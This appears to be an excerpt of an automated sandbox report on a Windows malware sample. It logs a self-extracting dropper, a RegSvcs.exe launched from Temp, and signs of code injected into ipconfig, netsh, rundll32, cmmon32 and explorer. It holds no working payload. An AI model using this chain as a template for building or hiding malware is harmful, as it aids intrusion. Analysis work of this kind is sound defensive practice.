              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: riched20.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: usp10.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: msls31.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: propsys.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: profapi.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: edputil.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: netutils.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: slc.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: sppc.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: mpr.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe  Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe  Section loaded: cdprt.dll
Source: C:\Windows\explorer.exe  Section loaded: mfsrcsnk.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmmon32.exe  Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmmon32.exe  Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: M1Y6kc9FpE.exe  Static file information: File size 1050479 > 1048576
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: M1Y6kc9FpE.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: M1Y6kc9FpE.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: M1Y6kc9FpE.exe, 00000000.00000003.1381988723.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp, M1Y6kc9FpE.exe, 00000000.00000003.1382771447.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: netsh.pdb source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: M1Y6kc9FpE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: M1Y6kc9FpE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: M1Y6kc9FpE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: M1Y6kc9FpE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: M1Y6kc9FpE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00535D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00535D78
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6987781
              Source: M1Y6kc9FpE.exe | Static PE information: section name: .didat
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A46680 push ecx; ret 0_2_00A46693
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A45773 push ecx; ret 0_2_00A45786
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00580332 push edi; ret 8_2_00580333
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00550E06 push ecx; ret 8_2_00550E19
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_004078CA push 0000006Ah; ret 15_2_004078CC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_004178E4 pushfd ; iretd 15_2_004178E5
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_004168B1 push ds; iretd 15_2_004168B2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_004179F9 push ss; ret 15_2_00417A01
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041EB46 push EF2477BEh; ret 15_2_0041EB4E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041EB4F push EF2477BEh; ret 15_2_0041EB4E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_00417B8A push ebx; iretd 15_2_00417B97
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041D4D2 push eax; ret 15_2_0041D4D8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041D4DB push eax; ret 15_2_0041D542
